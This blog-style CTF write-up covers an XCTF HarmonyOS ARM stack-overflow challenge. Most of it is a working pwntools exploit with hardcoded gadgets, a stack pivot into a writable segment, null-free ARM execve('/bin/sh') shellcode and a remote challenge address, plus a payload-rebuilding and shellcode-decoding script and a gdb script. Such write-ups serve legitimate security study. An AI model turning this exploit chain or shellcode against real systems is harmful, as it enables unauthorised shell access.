
XCTF Huawei HarmonyOS Special (XCTF华为鸿蒙专场): ARM Pwn1

source link: https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/29/arm/

Published 2020-12-29

Category: CTF/Pwn

A plain stack overflow. ARM challenges are usually run under QEMU user-mode emulation (qemu-arm), which by default does not enforce NX on guest pages, so there is no need for a libc leak: a short ROP chain pivots the stack into a writable data address (which QEMU will also happily execute), a second read() drops shellcode there, and the function epilogue returns into it.

from pwn import *
context(arch='arm',os='linux',log_level='debug')

# local debugging: the first line starts qemu-arm with a gdb stub on :1234
#io = process(["qemu-arm","-g","1234","-L",".","./bin"])
#io = process(["qemu-arm","-L",".","./bin"])
io = remote("139.159.210.220",9999)

# null-free ARM execve("/bin/sh", {"/bin/sh", NULL}, NULL) shellcode; it patches its own
# svc with a strb, so it must sit in memory that is both writable and executable
shellcode =  b'\x02\x20\x42\xe0\x1c\x30\x8f\xe2'   # sub r2,r2,r2 ; add r3,pc,#28  (r3 -> "/bin/sh;")
shellcode += b'\x04\x30\x8d\xe5\x08\x20\x8d\xe5'   # str r3,[sp,#4] ; str r2,[sp,#8]  (argv[0], NULL)
shellcode += b'\x13\x02\xa0\xe1\x07\x20\xc3\xe5'   # mov r0,r3,lsl r2 (r2=0) ; strb r2,[r3,#7]  (';' -> '\0')
shellcode += b'\x04\x30\x8f\xe2\x04\x10\x8d\xe2'   # add r3,pc,#4 (r3 -> svc) ; add r1,sp,#4  (r1 = argv)
shellcode += b'\x01\x20\xc3\xe5\x0b\x0b\x90\xef'   # strb r2,[r3,#1] turns svc 0x900b0b into 0x90000b (OABI execve) ; svc
shellcode += b'/bin/sh;'

pop_r3_pc = 0x00010348   # gadget: pop {r3, pc}
data_addr = 0x00021030   # writable data address in the binary: new frame + home for the shellcode
read_addr = 0x000104E8   # re-enters the binary's read() with r3 as the destination buffer

# 256 bytes of padding, then the saved fp is overwritten with data_addr and the saved lr with
# the gadget; the gadget pops r3 := data_addr and pc := read_addr, so the next read() lands at data_addr
payload = b'a'*256+p32(data_addr)+p32(pop_r3_pc)+p32(data_addr)+p32(read_addr)
io.sendafter("input: ",payload);sleep(0.1)
# second stage: the fake frame's saved pc (data_addr+4) followed by the shellcode; when the
# function epilogue restores sp from fp = data_addr it pops pc = data_addr+4 and runs the shellcode
io.sendline(p32(data_addr+4)+shellcode)
io.interactive()
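To make the pivot and the shellcode checkable offline, here is an added example (mine, not part of the original writeup) that rebuilds the two-stage payload with plain struct.pack and decodes the ARM shellcode it carries. The addresses and shellcode bytes are the writeup's; the 256-byte overflow distance, the saved-fp/saved-lr order and the frame-pointer epilogue (sub sp, fp, #4; pop {fp, pc}) are assumptions inferred from the payload, and the decoder only knows the handful of encodings this shellcode uses.

```python
"""Added example, not the writeup's code: rebuild the payload and decode the shellcode.
Assumed: BUF_SIZE, saved-fp-then-saved-lr layout, and a `sub sp, fp, #4; pop {fp, pc}` epilogue."""
import struct

POP_R3_PC = 0x00010348    # pop {r3, pc} gadget                        (from the writeup)
DATA_ADDR = 0x00021030    # writable data address, W+X under qemu-user (from the writeup)
READ_ADDR = 0x000104E8    # re-enters read() with r3 as the buffer      (from the writeup)
BUF_SIZE = 256            # assumed: padding up to the saved registers

SHELLCODE = (b'\x02\x20\x42\xe0\x1c\x30\x8f\xe2'
             b'\x04\x30\x8d\xe5\x08\x20\x8d\xe5'
             b'\x13\x02\xa0\xe1\x07\x20\xc3\xe5'
             b'\x04\x30\x8f\xe2\x04\x10\x8d\xe2'
             b'\x01\x20\xc3\xe5\x0b\x0b\x90\xef'
             b'/bin/sh;')


def p32(v):
    return struct.pack('<I', v)


def stage1():
    """Overflow: padding, saved fp := DATA_ADDR, saved lr := pop{r3,pc}; the gadget then
    pops r3 := DATA_ADDR and pc := READ_ADDR."""
    return b'a' * BUF_SIZE + p32(DATA_ADDR) + p32(POP_R3_PC) + p32(DATA_ADDR) + p32(READ_ADDR)


def stage2():
    """Bytes the second read() stores at DATA_ADDR: fake saved pc, then the shellcode."""
    return p32(DATA_ADDR + 4) + SHELLCODE


def pivot_target(stage2_bytes):
    """With fp == DATA_ADDR the assumed epilogue does sp = fp - 4; pop {fp, pc}: the new fp is
    the word at DATA_ADDR - 4 and pc is the word at DATA_ADDR, i.e. the first word of stage 2."""
    return struct.unpack_from('<I', stage2_bytes, 0)[0]


def _reg(n):
    return {13: 'sp', 14: 'lr', 15: 'pc'}.get(n, f'r{n}')


def decode(insn):
    """Decode one ARM instruction from the subset the shellcode uses (dp, LDR/STR, SVC)."""
    if insn >> 24 == 0xEF:                                  # SVC
        return f'svc #0x{insn & 0xFFFFFF:x}'
    kind = (insn >> 26) & 3
    rn, rd = (insn >> 16) & 0xF, (insn >> 12) & 0xF
    if kind == 1:                                           # single data transfer, imm offset
        name = 'ldr' if insn & (1 << 20) else 'str'
        name += 'b' if insn & (1 << 22) else ''
        return f'{name} {_reg(rd)}, [{_reg(rn)}, #{insn & 0xFFF}]'
    if kind == 0:                                           # data processing
        op = {0x2: 'sub', 0x4: 'add', 0xD: 'mov'}[(insn >> 21) & 0xF]
        dst = _reg(rd) if op == 'mov' else f'{_reg(rd)}, {_reg(rn)}'
        if insn & (1 << 25):                                # rotated 8-bit immediate
            rot, imm = 2 * ((insn >> 8) & 0xF), insn & 0xFF
            return f'{op} {dst}, #{((imm >> rot) | (imm << (32 - rot))) & 0xFFFFFFFF}'
        rm = _reg(insn & 0xF)
        if insn & (1 << 4):                                 # shift amount held in a register
            return f'{op} {dst}, {rm}, lsl {_reg((insn >> 8) & 0xF)}'
        return f'{op} {dst}, {rm}'
    raise ValueError(f'unhandled encoding {insn:#010x}')


def disassemble(code=SHELLCODE, n_insns=10):
    return [decode(struct.unpack_from('<I', code, 4 * i)[0]) for i in range(n_insns)]


def self_patched_svc(code=SHELLCODE):
    """Apply the shellcode's own `strb r2, [r3, #1]` (r2 = 0, r3 = pc+8+4 -> the svc at offset 36)
    and return the svc number it executes; 0x900000 + 11 is OABI execve."""
    buf = bytearray(code)
    buf[36 + 1] = 0
    return struct.unpack_from('<I', buf, 36)[0] & 0xFFFFFF


def argv0_string(code=SHELLCODE):
    """`add r3, pc, #28` at offset 4 points to 4+8+28 = 40; `strb r2, [r3, #7]` terminates it."""
    buf = bytearray(code)
    buf[40 + 7] = 0
    return bytes(buf[40:48]).split(b'\0')[0]


if __name__ == '__main__':
    for i, text in enumerate(disassemble()):
        print(f'{4 * i:2d}: {text}')
    print('null-free:', b'\0' not in SHELLCODE)
    print('pivot pc: %#x, svc after patch: %#x, argv0: %r'
          % (pivot_target(stage2()), self_patched_svc(), argv0_string()))
```

The two `strb` writes are the reason this shellcode needs memory that is both writable and executable: one turns the trailing ';' into the NUL terminator, the other zeroes a byte of the svc encoding so the payload can carry an OABI execve (0x90000b) without a null byte. Under qemu-arm that is fine, since guest NX is not enforced and the data segment at 0x21030 is writable; on a real kernel with W^X the same bytes would fault even if the pivot worked, and the plan would have to become a full ROP chain.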

gdb script (attach to the qemu-arm -g 1234 stub started above):

file bin
set architecture arm
b * 0x00010500
b * 0x000104F4
target remote :1234

The other writeups all use the universal gadget (the __libc_csu_init ROP trick), which I don't know how to use yet... For a QEMU challenge it feels like overkill: you have to leak libc and so on, and the exploit is full of immediates, which is hard to follow.
